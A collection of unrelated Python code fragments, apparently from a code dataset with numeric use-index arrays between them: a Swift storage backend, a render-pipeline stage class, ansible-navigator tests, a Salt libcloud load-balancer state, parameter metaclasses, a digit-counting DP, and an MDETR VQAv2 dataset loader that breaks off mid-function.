# If file_name was not specified, use S3 key
if file_name is None:
file_name = key
# Download the file
try:
dirname = os.path.dirname(file_name)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
with open(file_name, 'wb') as out:
data_stream = self.get_object(bucket, key, stream=True)
shutil.copyfileobj(data_stream, out)
except Exception as e:
logging.error(e)
return False
return True
def head_object(self, container_name, key):
"""
Head object from Swift with a key. Throws StorageNoSuchKeyError if the given key does not exist.
:param key: key of the object
:return: Data of the object
:rtype: str/bytes
"""
url = '/'.join([self.endpoint, container_name, key])
try:
res = self.session.head(url)
if res.status_code == 200:
return res.headers
elif res.status_code == 404:
raise StorageNoSuchKeyError(container_name, key)
else:
raise Exception('{} - {}'.format(res.status_code, key))
except Exception as e:
raise StorageNoSuchKeyError(container_name, key)
def delete_object(self, container_name, key):
"""
Delete an object from Swift.
:param bucket: bucket name
:param key: data key
"""
url = '/'.join([self.endpoint, container_name, key])
return self.session.delete(url)
def delete_objects(self, container_name, key_list):
"""
Delete a list of objects from Swift.
:param bucket: bucket name
:param key: data key
"""
headers={'X-Auth-Token': self.token,
'X-Bulk-Delete': 'True'}
keys_to_delete = []
for key in key_list:
keys_to_delete.append('/{}/{}'.format(container_name, key))
keys_to_delete = '\n'.join(keys_to_delete)
url = '/'.join([self.endpoint, '?bulk-delete'])
return self.session.delete(url, data=keys_to_delete, headers=headers)
def list_objects(self, container_name, prefix=''):
"""
Lists the objects in a bucket. Throws StorageNoSuchKeyError if the given bucket does not exist.
:param key: key of the object
:return: Data of the object
:rtype: str/bytes
"""
if prefix:
url = '/'.join([self.endpoint, container_name, '?format=json&prefix='+prefix])
else:
url = '/'.join([self.endpoint, container_name, '?format=json'])
try:
res = self.session.get(url)
objects = res.json()
# TODO: Adapt to Key and Size
return objects
except Exception as e:
raise e
def list_keys(self, container_name, prefix):
"""
Return a list of keys for the given prefix.
:param prefix: Prefix to filter object names.
:return: List of keys in bucket that match the given prefix.
:rtype: list of str
"""
try:
objects = self.list_objects(container_name, prefix)
object_keys = [r['name'] for r in objects]
return object_keys
except Exception as e:
raise(e)
| [
[
[
589,
591
],
[
5786,
5788
],
[
6574,
6576
],
[
6632,
6634
],
[
6673,
6675
]
],
[
[
599,
603
],
[
2518,
2522
],
[
2661,
2665
],
[
3241,
3245
]
],
[
[
611,
617
],
[
6829,
6835
]
],
[
[
625,
632
],
[
798,
805
],
[
6002,
6009
],
[
6909,
6916
]
],
[
[
640,
648
],
[
1634,
1642
],
[
1737,
1745
],
[
2548,
2556
]
],
[
[
683,
704
],
[
5021,
5042
],
[
5169,
5190
],
[
5210,
5231
],
[
5323,
5344
],
[
7501,
7522
],
[
7683,
7704
]
],
[
[
731,
741
],
[
3933,
3943
]
],
[
[
772,
787
],
[
1909,
1924
]
],
[
[
789,
795
],
[
956,
962
],
[
1959,
1965
],
[
3876,
3882
],
[
4011,
4017
]
],
[
[
834,
848
]
]
] |
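A hypothetical configuration sketch for the Swift StorageBackend above; the key names mirror the swift_config fields read in __init__, while the values, container and object names are placeholders (constructing the backend performs a real Keystone authentication request):
swift_config = {
    'swift_auth_url': 'http://keystone.example.com:5000',
    'swift_user_id': 'my-user-id',
    'swift_project_id': 'my-project-id',
    'swift_password': 'secret',
    'swift_region': 'RegionOne',
}
backend = StorageBackend(swift_config)
backend.put_object('my-container', 'hello.txt', b'hello world')
print(backend.list_keys('my-container', prefix='hello'))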
"""
RenderPipeline
Copyright (c) 2014-2016 tobspr <tobias.springer1@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from rpcore.render_target import RenderTarget
from rpcore.loader import RPLoader
class RenderStage():
""" This class is the abstract class for all stages used in the pipeline.
It represents a part of the pipeline render process. Each stage specifies
which pipes it uses and which pipes it produces. A pipe can be seen as a
texture, which gets modified. E.g. the gbuffer pass produces the gbuffer
pipe, the ambient occlusion pass produces the occlusion pipe and so on. The
lighting pass can then specify which pipes it needs and compute the image.
Using a pipe system ensures that new techniques can be inserted easily,
without the other techniques even being aware of them """
required_inputs = []
required_pipes = []
produced_inputs = {}
produced_pipes = {}
produced_defines = {}
disabled = False
def __init__(self, pipeline):
""" Creates a new render stage """
self.stage_id = self.__class__.__name__
self._pipeline = pipeline
self._active = True
self._targets = {}
def create(self):
""" This method should setup the stage and create the pipes """
raise NotImplementedError()
def reload_shaders(self):
""" This method should set all required shaders, there should be no
shaders set in the create method, because the shader auto config is not
generated there """
pass
def set_shader_input(self, *args):
""" This method sets a shader input on all stages, which is mainly used
by the stage manager """
for target in self._targets.values():
target.set_shader_input(*args)
def set_shader_inputs(self, **kwargs):
""" This method sets shader inputs on all stages, which is mainly used
by the stage manager """
for target in self._targets.values():
target.set_shader_inputs(**kwargs)
def update(self):
""" This method gets called every frame, and can be overridden by render
stages to perform custom updates """
pass
@property
def active(self):
""" Returns whether *all* targets of the stage are active """
return self._active
@active.setter
def active(self, state):
""" Enables or disables this stage. In case the stage is disabled, it will
        not get updated anymore, and all of its targets are disabled as well """
if self._active != state:
self._active = state
for target in self._targets.values():
target.active = self._active
def create_target(self, name):
""" Creates a new render target and binds it to this stage """
# Format the name like Plugin:Stage:Name, so it can be easily
        # found in pstats below the plugin category
name = self._get_plugin_id() + ":" + self.stage_id + ":" + name
if name in self._targets:
return self.error("Overriding existing target: " + name)
self._targets[name] = RenderTarget(name)
return self._targets[name]
def remove_target(self, target):
""" Removes a previously registered target. This unregisters the
target, as well as removing it from the list of assigned targets. """
target.remove()
target_key = None
for key, value_target in self._targets.items():
if target == value_target:
target_key = key
break
del self._targets[target_key]
def _get_shader_handle(self, path, *args):
""" Returns a handle to a Shader object, containing all sources passed
as arguments. The path argument will be used to locate shaders if no
absolute path is given. This is the internal method used in load_shader
and load_plugin_shader. """
assert len(args) > 0 and len(args) <= 3
path_args = []
for source in args:
for prefix in ("/$$rpconfig", "/$$rp/shader", "/$$rptemp"):
if prefix in source:
path_args.append(source)
break
else:
path_args.append(path.format(source))
        # If only one shader is specified, assume it's a postprocess fragment shader,
# and use the default vertex shader
if len(args) == 1:
path_args = ["/$$rp/shader/default_post_process.vert.glsl"] + path_args
return RPLoader.load_shader(*path_args)
def _get_plugin_id(self):
""" Returns the id of the plugin which created this stage. This is done
by extracting the name of the plugin from the module name """
if "rpcore.stages" in self.__class__.__module__:
return "render_pipeline_internal"
return str(self.__class__.__module__).split(".")[-2]
def load_shader(self, *args):
""" Loads a shader from the given args. If only one argument is passed,
the default template for the stage is loaded. If two arguments are
passed, the first argument should be the vertex shader and the second
argument should be the fragment shader. If three arguments are passed,
the order should be vertex, fragment, geometry """
return self._get_shader_handle("/$$rp/shader/{0}", *args)
def load_plugin_shader(self, *args):
""" Loads a shader from the plugin directory. This method is useful
for RenderStages created by plugins. For a description of the arguments,
see the load_shader function. """
shader_path = "rpplugins/" + self._get_plugin_id() + "/shader/{0}"
return self._get_shader_handle(shader_path, *args)
def handle_window_resize(self):
""" This method gets called when the window gets resized. By default,
this just resizes all render targets. """
self.set_dimensions()
for target in self._targets.values():
target.consider_resize()
def set_dimensions(self):
""" This method should set the dimensions on all targets which don't
have a relative constraint, and also the size of all images. This
is called after initialization, and when the window resized. """
pass
| [
[
[
1144,
1156
],
[
4127,
4139
]
],
[
[
1183,
1191
],
[
5536,
5544
]
],
[
[
1200,
1211
]
]
] |
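A minimal subclass sketch for the RenderStage base above. create_target() and load_shader() come from the base class as shown; the attachment/prepare calls and the `shader` attribute on the returned target are assumptions about this project's RenderTarget API and may differ in detail:
class SampleStage(RenderStage):
    required_pipes = ["GBuffer"]
    produced_pipes = ["SampleResult"]

    def create(self):
        self.target = self.create_target("Sample")
        self.target.add_color_attachment(bits=16)  # assumed RenderTarget call
        self.target.prepare_buffer()               # assumed RenderTarget call

    def reload_shaders(self):
        # A single argument is treated as a post-process fragment shader (see above)
        self.target.shader = self.load_shader("sample.frag.glsl")  # assumed attribute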
"""Base class for inventory interactive/stdout tests.
"""
import difflib
import json
import os
import pytest
from ....defaults import FIXTURES_DIR
from ..._common import fixture_path_from_request
from ..._common import update_fixtures
from ..._interactions import SearchFor
from ..._interactions import Step
from ..._tmux_session import TmuxSession
TEST_FIXTURE_DIR = os.path.join(FIXTURES_DIR, "integration", "actions", "inventory")
ANSIBLE_INVENTORY_FIXTURE_DIR = os.path.join(TEST_FIXTURE_DIR, "ansible_inventory", "inventory.yml")
TEST_CONFIG_FILE = os.path.join(TEST_FIXTURE_DIR, "ansible-navigator.yml")
base_steps = (
Step(user_input=":0", comment="Browse hosts/ungrouped window"),
Step(user_input=":0", comment="Group list window"),
Step(user_input=":0", comment="group01 hosts detail window"),
Step(user_input=":0", comment="host0101 detail window"),
Step(user_input=":back", comment="Previous window (group01 hosts detail window)"),
Step(user_input=":back", comment="Previous window (Group list window)"),
Step(user_input=":1", comment="group02 hosts detail window"),
Step(user_input=":0", comment="host0201 detail window"),
Step(user_input=":back", comment="Previous window (group02 hosts detail window)"),
Step(user_input=":back", comment="Previous window (Group list window)"),
Step(user_input=":2", comment="group03 hosts detail window"),
Step(user_input=":0", comment="host0301 detail window"),
Step(user_input=":back", comment="Previous window (group03 hosts detail window)"),
Step(user_input=":back", comment="Previous window (Group list window)"),
Step(user_input=":back", comment="Previous window (Browse hosts/ungrouped window)"),
Step(user_input=":back", comment="Previous window (top window)"),
Step(user_input=":1", comment="Inventory hostname window"),
Step(user_input=":0", comment="host0101 detail window"),
Step(user_input=":back", comment="Previous window after host0101 (Inventory hostname window)"),
Step(user_input=":1", comment="host0201 detail window"),
Step(user_input=":back", comment="Previous window after host0201 (Inventory hostname window)"),
Step(user_input=":2", comment="host0301 detail window"),
)
class BaseClass:
"""base class for inventory interactive/stdout tests"""
UPDATE_FIXTURES = False
@staticmethod
@pytest.fixture(scope="module", name="tmux_session")
def fixture_tmux_session(request):
"""tmux fixture for this module"""
params = {
"setup_commands": [
"export ANSIBLE_DEVEL_WARNING=False",
"export ANSIBLE_DEPRECATION_WARNINGS=False",
],
"pane_height": "2000",
"pane_width": "500",
"config_path": TEST_CONFIG_FILE,
"unique_test_id": request.node.nodeid,
}
with TmuxSession(**params) as tmux_session:
yield tmux_session
def test(self, request, tmux_session, step):
"""Run the tests for inventory, mode and ``ee`` set in child class."""
assert os.path.exists(ANSIBLE_INVENTORY_FIXTURE_DIR)
assert os.path.exists(TEST_CONFIG_FILE)
if step.search_within_response is SearchFor.HELP:
search_within_response = ":help help"
elif step.search_within_response is SearchFor.PROMPT:
search_within_response = tmux_session.cli_prompt
else:
raise ValueError("test mode not set")
received_output = tmux_session.interaction(
value=step.user_input,
search_within_response=search_within_response,
)
if step.mask:
# mask out some configuration that is subject to change each run
mask = "X" * 50
for idx, line in enumerate(received_output):
if tmux_session.cli_prompt in line:
received_output[idx] = mask
fixtures_update_requested = (
self.UPDATE_FIXTURES
or os.environ.get("ANSIBLE_NAVIGATOR_UPDATE_TEST_FIXTURES") == "true"
and not any((step.look_fors, step.look_nots))
)
if fixtures_update_requested:
update_fixtures(
request,
step.step_index,
received_output,
step.comment,
additional_information={
"look_fors": step.look_fors,
"look_nots": step.look_nots,
"compared_fixture": not any((step.look_fors, step.look_nots)),
},
)
page = " ".join(received_output)
if step.look_fors:
assert all(look_for in page for look_for in step.look_fors)
if step.look_nots:
assert not any(look_not in page for look_not in step.look_nots)
if not any((step.look_fors, step.look_nots)):
dir_path, file_name = fixture_path_from_request(request, step.step_index)
with open(file=os.path.join(dir_path, file_name), encoding="utf-8") as infile:
expected_output = json.load(infile)["output"]
assert expected_output == received_output, "\n" + "\n".join(
difflib.unified_diff(expected_output, received_output, "expected", "received"),
)
| [
[
[
65,
72
],
[
5210,
5217
]
],
[
[
80,
84
],
[
5092,
5096
]
],
[
[
92,
94
],
[
372,
374
],
[
470,
472
],
[
558,
560
],
[
3085,
3087
],
[
3146,
3148
],
[
4003,
4005
],
[
4994,
4996
]
],
[
[
103,
109
],
[
2368,
2374
]
],
[
[
136,
148
],
[
385,
397
]
],
[
[
172,
197
],
[
4915,
4940
]
],
[
[
221,
236
],
[
4188,
4203
]
],
[
[
266,
275
],
[
3222,
3231
],
[
3332,
3341
]
],
[
[
305,
309
],
[
635,
639
],
[
703,
707
],
[
759,
763
],
[
825,
829
],
[
886,
890
],
[
973,
977
],
[
1050,
1054
],
[
1116,
1120
],
[
1177,
1181
],
[
1264,
1268
],
[
1341,
1345
],
[
1407,
1411
],
[
1468,
1472
],
[
1555,
1559
],
[
1632,
1636
],
[
1721,
1725
],
[
1791,
1795
],
[
1855,
1859
],
[
1916,
1920
],
[
2016,
2020
],
[
2077,
2081
],
[
2177,
2181
]
],
[
[
339,
350
],
[
2871,
2882
]
],
[
[
353,
369
],
[
483,
499
],
[
571,
587
]
],
[
[
438,
467
],
[
3100,
3129
]
],
[
[
539,
555
],
[
2778,
2794
],
[
3161,
3177
]
],
[
[
616,
626
]
],
[
[
2244,
2253
]
]
] |
# -*- coding: utf-8 -*-
'''
Apache Libcloud Load Balancer State
===================================
Manage load balancers using libcloud
:codeauthor: ``Anthony Shaw <anthonyshaw@apache.org>``
Apache Libcloud load balancer management. For a full list
of supported clouds, see http://libcloud.readthedocs.io/en/latest/loadbalancer/supported_providers.html
Clouds include Amazon ELB, ALB, Google, Aliyun, CloudStack, Softlayer
.. versionadded:: 2018.3.0
:configuration:
This module uses a configuration profile for one or multiple Cloud providers
.. code-block:: yaml
libcloud_loadbalancer:
profile_test1:
driver: gce
key: GOOG0123456789ABCXYZ
secret: mysecret
profile_test2:
driver: alb
key: 12345
secret: mysecret
Example:
Using States to deploy a load balancer with extended arguments to specify region
.. code-block:: yaml
lb_test:
libcloud_loadbalancer.balancer_present:
- name: example
- port: 80
- protocol: http
- profile: google
- ex_region: us-east1
:depends: apache-libcloud
'''
# Import Python Libs
from __future__ import absolute_import, unicode_literals, print_function
import logging
# Import salt libs
import salt.utils.compat
log = logging.getLogger(__name__)
def __virtual__():
return True
def __init__(opts):
salt.utils.compat.pack_dunder(__name__)
def state_result(result, message, name, changes=None):
if changes is None:
changes = {}
return {'result': result,
'comment': message,
'name': name,
'changes': changes}
def balancer_present(name, port, protocol, profile, algorithm=None, members=None, **libcloud_kwargs):
'''
Ensures a load balancer is present.
:param name: Load Balancer name
:type name: ``str``
:param port: Port the load balancer should listen on, defaults to 80
:type port: ``str``
:param protocol: Loadbalancer protocol, defaults to http.
:type protocol: ``str``
:param profile: The profile key
:type profile: ``str``
:param algorithm: Load balancing algorithm, defaults to ROUND_ROBIN. See Algorithm type
in Libcloud documentation for a full listing.
:type algorithm: ``str``
:param members: An optional list of members to create on deployment
:type members: ``list`` of ``dict`` (ip, port)
'''
balancers = __salt__['libcloud_loadbalancer.list_balancers'](profile)
match = [z for z in balancers if z['name'] == name]
if len(match) > 0:
return state_result(True, "Balancer already exists", name)
else:
starting_members = None
if members is not None:
starting_members = []
for m in members:
starting_members.append({'ip': m['ip'], 'port': m['port']})
balancer = __salt__['libcloud_loadbalancer.create_balancer'](
name, port, protocol,
profile, algorithm=algorithm,
members=starting_members,
**libcloud_kwargs)
return state_result(True, "Created new load balancer", name, balancer)
def balancer_absent(name, profile, **libcloud_kwargs):
'''
Ensures a load balancer is absent.
:param name: Load Balancer name
:type name: ``str``
:param profile: The profile key
:type profile: ``str``
'''
balancers = __salt__['libcloud_loadbalancer.list_balancers'](profile)
match = [z for z in balancers if z['name'] == name]
if len(match) == 0:
return state_result(True, "Balancer already absent", name)
else:
result = __salt__['libcloud_loadbalancer.destroy_balancer'](match[0]['id'], profile, **libcloud_kwargs)
return state_result(result, "Deleted load balancer", name)
def member_present(ip, port, balancer_id, profile, **libcloud_kwargs):
'''
Ensure a load balancer member is present
:param ip: IP address for the new member
:type ip: ``str``
:param port: Port for the new member
:type port: ``int``
:param balancer_id: id of a load balancer you want to attach the member to
:type balancer_id: ``str``
:param profile: The profile key
:type profile: ``str``
'''
existing_members = __salt__['libcloud_loadbalancer.list_balancer_members'](balancer_id, profile)
for member in existing_members:
if member['ip'] == ip and member['port'] == port:
return state_result(True, "Member already present", balancer_id)
member = __salt__['libcloud_loadbalancer.balancer_attach_member'](balancer_id, ip, port, profile, **libcloud_kwargs)
return state_result(True, "Member added to balancer, id: {0}".format(member['id']), balancer_id, member)
def member_absent(ip, port, balancer_id, profile, **libcloud_kwargs):
'''
Ensure a load balancer member is absent, based on IP and Port
:param ip: IP address for the member
:type ip: ``str``
:param port: Port for the member
:type port: ``int``
:param balancer_id: id of a load balancer you want to detach the member from
:type balancer_id: ``str``
:param profile: The profile key
:type profile: ``str``
'''
existing_members = __salt__['libcloud_loadbalancer.list_balancer_members'](balancer_id, profile)
for member in existing_members:
if member['ip'] == ip and member['port'] == port:
result = __salt__['libcloud_loadbalancer.balancer_detach_member'](balancer_id, member['id'], profile, **libcloud_kwargs)
return state_result(result, "Member removed", balancer_id)
return state_result(True, "Member already absent", balancer_id)
| [
[
[
1244,
1259
]
],
[
[
1261,
1277
]
],
[
[
1279,
1293
]
],
[
[
1301,
1308
],
[
1361,
1368
]
],
[
[
1336,
1353
],
[
1452,
1456
]
],
[
[
1355,
1358
]
],
[
[
1395,
1406
]
],
[
[
1432,
1440
]
],
[
[
1498,
1510
],
[
2661,
2673
],
[
3157,
3169
],
[
3629,
3641
],
[
3818,
3830
],
[
4531,
4543
],
[
4721,
4733
],
[
5627,
5639
],
[
5690,
5702
]
],
[
[
1720,
1736
]
],
[
[
3227,
3242
]
],
[
[
3876,
3890
]
],
[
[
4825,
4838
]
]
] |
import pathlib
from silex_client.utils.log import logger
class AnyParameter(object):
def __new__(cls, value):
return value
class CommandParameterMeta(type):
def __new__(cls, name: str, bases: tuple, dct: dict):
def serialize():
return {
"name": "parameter",
}
attributes = {
"serialize": serialize,
}
attributes.update(dct)
return super().__new__(cls, name, bases, attributes)
def get_default(self):
return None
def serialize(self):
return None
class TaskParameterMeta(CommandParameterMeta):
def __init__(self):
pass
def __new__(cls):
def serialize():
return {
"name": "task",
}
def get_default():
return ""
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "TaskParameter", (str,), attributes)
class IntArrayParameterMeta(CommandParameterMeta):
def __init__(self, size: int):
pass
def __new__(cls, size: int):
def __init__(self, value):
if not isinstance(value, list):
value = [value]
for index, item in enumerate(value):
value[index] = int(item)
self.extend(value)
def serialize():
return {
"name": "int_array",
"size": size,
}
def get_default():
return [0 for i in range(size)]
attributes = {
"__init__": __init__,
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "IntArrayParameter", (list,), attributes)
class RangeParameterMeta(CommandParameterMeta):
def __init__(self, start: int, end: int, increment: int = 1):
pass
def __new__(cls, start: int, end: int, increment: int = 1):
def serialize():
return {
"name": "range",
"start": start,
"end": end,
"increment": increment,
}
def get_default():
return start
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "RangeParameter", (int,), attributes)
class SelectParameterMeta(CommandParameterMeta):
def __init__(self, *list_options, **options):
pass
def __new__(cls, *list_options, **options):
for unnamed_option in list_options:
options[unnamed_option] = unnamed_option
def serialize():
return {"name": "select", "options": options}
def get_default():
return list(options.values())[0] if options else None
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "SelectParameter", (str,), attributes)
class RadioSelectParameterMeta(CommandParameterMeta):
def __init__(self, *list_options, **options):
pass
def __new__(cls, *list_options, **options):
for unnamed_option in list_options:
options[unnamed_option] = unnamed_option
def serialize():
return {"name": "radio_select", "options": options}
def get_default():
return list(options.values())[0] if options else None
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "RadioSelectParameter", (str,), attributes)
class MultipleSelectParameterMeta(CommandParameterMeta):
def __init__(self, *list_options, **options):
pass
def __new__(cls, *list_options, **options):
for unnamed_option in list_options:
options[unnamed_option] = unnamed_option
def serialize():
return {"name": "multiple_select", "options": options}
def get_default():
return [list(options.values())[0]] if options else None
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "SelectParameter", (list,), attributes)
# TODO: Replace this parameter with ListParameterMeta
class ListParameter(list):
def __init__(self, value):
logger.warning(
"Deprecation warning: The parameter type ListParameter is deprecated in favor if ListParameterMeta()"
)
data = value
if not isinstance(value, list):
data = [value]
self.extend(data)
class PathParameterMeta(CommandParameterMeta):
def __init__(self, extensions=None, multiple=False):
pass
def __new__(cls, extensions=None, multiple=False):
if extensions is None:
extensions = ["*"]
def __init_list__(self, value):
if not isinstance(value, list):
value = [value]
for index, item in enumerate(value):
value[index] = pathlib.Path(item)
self.extend(value)
def serialize():
return {
"name": "Path",
"extensions": extensions,
"multiple": multiple,
}
def get_default():
return None
attributes = {
"serialize": serialize,
"get_default": get_default,
}
if multiple:
attributes["__init__"] = __init_list__
return super().__new__(cls, "PathParameter", (list,), attributes)
return super().__new__(
cls, "PathParameter", (type(pathlib.Path()),), attributes
)
class ListParameterMeta(CommandParameterMeta):
def __init__(self, parameter_type):
pass
def __new__(cls, parameter_type):
def __init__(self, value):
if not isinstance(value, list):
value = [value]
for index, item in enumerate(value):
value[index] = parameter_type(item)
self.extend(value)
def serialize():
item_type = None
if isinstance(parameter_type, CommandParameterMeta):
return parameter_type.serialize()
elif isinstance(parameter_type, type):
item_type = {"name": parameter_type.__name__}
return {"name": "list", "itemtype": item_type}
def get_default():
return []
attributes = {
"__init__": __init__,
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "ListParameter", (list,), attributes)
class TextParameterMeta(CommandParameterMeta):
def __init__(self, color=None):
pass
def __new__(cls, color=None):
def serialize():
return {"name": "text", "color": color}
def get_default():
return ""
attributes = {
"serialize": serialize,
"get_default": get_default,
}
return super().__new__(cls, "ListParameter", (str,), attributes)
| [
[
[
7,
14
],
[
5761,
5768
],
[
5151,
5158
]
],
[
[
51,
57
],
[
4461,
4467
]
],
[
[
66,
78
]
],
[
[
146,
166
],
[
611,
631
],
[
1049,
1069
],
[
1837,
1857
],
[
2462,
2482
],
[
3090,
3110
],
[
3732,
3752
],
[
4742,
4762
],
[
5827,
5847
],
[
6827,
6847
],
[
6285,
6305
]
],
[
[
593,
610
]
],
[
[
1027,
1048
]
],
[
[
1818,
1836
]
],
[
[
2442,
2461
]
],
[
[
3065,
3089
]
],
[
[
3704,
3731
]
],
[
[
4401,
4414
]
],
[
[
4724,
4741
]
],
[
[
5809,
5826
]
],
[
[
6809,
6826
]
]
] |
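A small usage sketch (not part of the original record): each metaclass above manufactures a parameter type on the fly, and calling that type coerces a value.
IntPair = IntArrayParameterMeta(2)
print(IntPair.serialize())    # {'name': 'int_array', 'size': 2}
print(IntPair.get_default())  # [0, 0]
print(IntPair([3, "4"]))      # [3, 4] -- items coerced to int

Quality = SelectParameterMeta("low", "high")
print(Quality.serialize())    # {'name': 'select', 'options': {'low': 'low', 'high': 'high'}}
print(Quality.get_default())  # low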
N = input()
L = len(N)
K = int(input())
dp = [[[0] * 2 for _ in range(K + 1)] for _ in range(L + 1)]
dp[0][0][1] = 1
for i, x in zip(range(L), map(int, N)):
for k in range(K):
dp[i+1][k][0] += dp[i][k][0] # d == 0
if x == 0:
dp[i+1][k][1] += dp[i][k][1]
elif x > 0:
dp[i+1][k][0] += dp[i][k][1]
# d != 0
for d in range(1, 10):
dp[i+1][k+1][0] += dp[i][k][0]
if d == x:
dp[i+1][k+1][1] += dp[i][k][1]
elif d < x:
dp[i+1][k+1][0] += dp[i][k][1]
dp[i+1][K][0] += dp[i][K][0] # k == K and d == 0
if x == 0:
dp[i+1][K][1] += dp[i][K][1]
elif x > 0:
dp[i+1][K][0] += dp[i][K][1]
print(sum(dp[-1][K]))
| [
[
[
0,
1
],
[
20,
21
],
[
152,
153
]
],
[
[
12,
13
],
[
93,
94
],
[
139,
140
]
],
[
[
23,
24
],
[
70,
71
],
[
176,
177
],
[
607,
608
],
[
592,
593
],
[
680,
681
],
[
665,
666
],
[
733,
734
],
[
718,
719
],
[
756,
757
]
],
[
[
40,
42
],
[
101,
103
],
[
205,
207
],
[
188,
190
],
[
275,
277
],
[
258,
260
],
[
336,
338
],
[
319,
321
],
[
427,
429
],
[
408,
410
],
[
497,
499
],
[
478,
480
],
[
568,
570
],
[
549,
551
],
[
601,
603
],
[
584,
586
],
[
674,
676
],
[
657,
659
],
[
727,
729
],
[
710,
712
],
[
749,
751
]
],
[
[
121,
122
],
[
208,
209
],
[
191,
192
],
[
278,
279
],
[
261,
262
],
[
339,
340
],
[
322,
323
],
[
430,
431
],
[
411,
412
],
[
500,
501
],
[
481,
482
],
[
571,
572
],
[
552,
553
],
[
604,
605
],
[
587,
588
],
[
677,
678
],
[
660,
661
],
[
730,
731
],
[
713,
714
]
],
[
[
124,
125
],
[
238,
239
],
[
300,
301
],
[
459,
460
],
[
530,
531
],
[
641,
642
],
[
695,
696
]
],
[
[
165,
166
],
[
211,
212
],
[
196,
197
],
[
281,
282
],
[
266,
267
],
[
342,
343
],
[
327,
328
],
[
433,
434
],
[
416,
417
],
[
503,
504
],
[
486,
487
],
[
574,
575
],
[
557,
558
]
],
[
[
377,
378
],
[
454,
455
],
[
526,
527
]
]
] |
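A brute-force cross-check (not part of the original record), under the reading that the DP above counts the integers in [1, N] whose decimal representation contains exactly K nonzero digits:
def count_naive(n: int, k: int) -> int:
    return sum(1 for x in range(1, n + 1)
               if sum(d != '0' for d in str(x)) == k)

# For N = 100, K = 1: 1..9, 10, 20, ..., 90 and 100 -> 19 numbers.
assert count_naive(100, 1) == 19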
config = {
"username": 'slask',
"icon": ":poop:",
}
| [
[
[
0,
6
]
]
] |
# Copyright (c) Aishwarya Kamath & Nicolas Carion. Licensed under the Apache License 2.0. All Rights Reserved
"""
COCO dataset which returns image_id for evaluation.
Mostly copy-paste from https://github.com/ashkamath/mdetr/blob/main/datasets/gqa.py
"""
import json
from pathlib import Path
import torch
import torchvision
from transformers import RobertaTokenizerFast
from .coco import ConvertCocoPolysToMask, ModulatedDetection, make_coco_transforms
class VQAv2Detection(ModulatedDetection):
pass
class VQAv2QuestionAnswering(torchvision.datasets.CocoDetection):
def __init__(self, img_folder, ann_file, transforms, return_masks, return_tokens, tokenizer, ann_folder):
super(VQAv2QuestionAnswering, self).__init__(img_folder, ann_file)
self._transforms = transforms
self.prepare = ConvertCocoPolysToMask(return_masks, return_tokens, tokenizer=tokenizer)
with open(ann_folder / "vqa2_answer2id.json", "r") as f:
self.answer2id = json.load(f)
with open(ann_folder / "vqa2_answer2id_by_type.json", "r") as f:
self.answer2id_by_type = json.load(f)
self.type2id = {"yes/no": 0, "number": 1, "other": 2}
def __getitem__(self, idx):
img, target = super(VQAv2QuestionAnswering, self).__getitem__(idx)
image_id = self.ids[idx]
coco_img = self.coco.loadImgs(image_id)[0]
caption = coco_img["caption"]
dataset_name = coco_img["dataset_name"]
questionId = coco_img["questionId"]
target = {"image_id": image_id, "annotations": target, "caption": caption}
img, target = self.prepare(img, target)
if self._transforms is not None:
img, target = self._transforms(img, target)
target["dataset_name"] = dataset_name
target["questionId"] = questionId
if coco_img["answer"] not in self.answer2id:
answer = "unknown"
else:
answer = coco_img["answer"]
target["answer"] = torch.as_tensor(self.answer2id[answer], dtype=torch.long)
target["answer_type"] = torch.as_tensor(self.type2id[coco_img["answer_type"]], dtype=torch.long)
        # util.misc.collate_fn requires 'answer' to come before every other answer type in target
if coco_img["answer"] not in self.answer2id_by_type["yes/no"]:
answer = "unknown"
else:
answer = coco_img["answer"]
target["answer_yes/no"] = torch.as_tensor(
self.answer2id_by_type["yes/no"][answer] if coco_img["answer_type"] == "yes/no" else -100,
dtype=torch.long,
)
if coco_img["answer"] not in self.answer2id_by_type["number"]:
answer = "unknown"
else:
answer = coco_img["answer"]
target["answer_number"] = torch.as_tensor(
self.answer2id_by_type["number"][answer] if coco_img["answer_type"] == "number" else -100,
dtype=torch.long,
)
if coco_img["answer"] not in self.answer2id_by_type["other"]:
answer = "unknown"
else:
answer = coco_img["answer"]
target["answer_other"] = torch.as_tensor(
self.answer2id_by_type["other"][answer] if coco_img["answer_type"] == "other" else -100,
dtype=torch.long,
)
return img, target
def build(image_set, args):
# TODO: img or all?
img_dir = Path(args.coco_img_path)
assert img_dir.exists(), f"provided COCO img path {img_dir} does not exist"
tokenizer = RobertaTokenizerFast.from_pretrained(args.text_encoder_type)
if args.do_qa:
        # Not needed for vqa2:
# assert args.vqa2_split_type is not None
if image_set == "train":
datasets = []
for imset in ["train", "minival"]:
ann_file = Path(args.vqa2_ann_path) / f"finetune_vqa2_{imset}.json"
datasets.append(
VQAv2QuestionAnswering(
img_dir / "train2014" if imset == "train" else img_dir / "val2014",
ann_file,
transforms=make_coco_transforms(image_set, cautious=True),
return_masks=args.masks,
return_tokens=True,
tokenizer=tokenizer,
ann_folder=Path(args.vqa2_ann_path),
)
)
return torch.utils.data.ConcatDataset(datasets)
elif image_set == "val":
